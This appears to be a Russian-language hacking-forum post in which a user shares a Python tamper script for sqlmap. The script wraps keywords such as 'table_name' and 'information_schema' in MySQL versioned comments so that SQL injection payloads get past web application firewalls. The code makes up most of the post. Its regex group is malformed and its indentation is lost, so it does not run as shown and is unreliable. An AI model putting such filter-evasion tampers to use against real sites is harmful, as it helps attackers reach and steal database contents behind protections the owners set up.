19.03.2019, 10:54
|
|
Новичок
Регистрация: 30.01.2019
Сообщений: 15
С нами:
3835766
Репутация:
3
|
|
Сообщение от BenderMR
↑
Спасибо, то что нужно. А как расширить данный функционал для /*!50000information_schema*/.tables etc. Пробовал переписать немного этот тампер, но не вышло.
Может есть кто то делал подобные тамперы под informatio_schema?
В repStr перечислять нужное через " |" (регистр неважен) и экранировать спец. символы :
Код:
#!/usr/bin/env python
import re
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.HIGHER
def tamper(payload, **kwargs):
def process(match):
word = match.group('word')
return match.group().replace(word, "/*!12345%s*/" % word)
retVal = payload
if payload:
repStr = "table_name|information_schema"
retVal = re.sub(r"(?P" + repStr + ")", lambda match: process(match), retVal,flags=re.IGNORECASE)
return retVal
|
|
|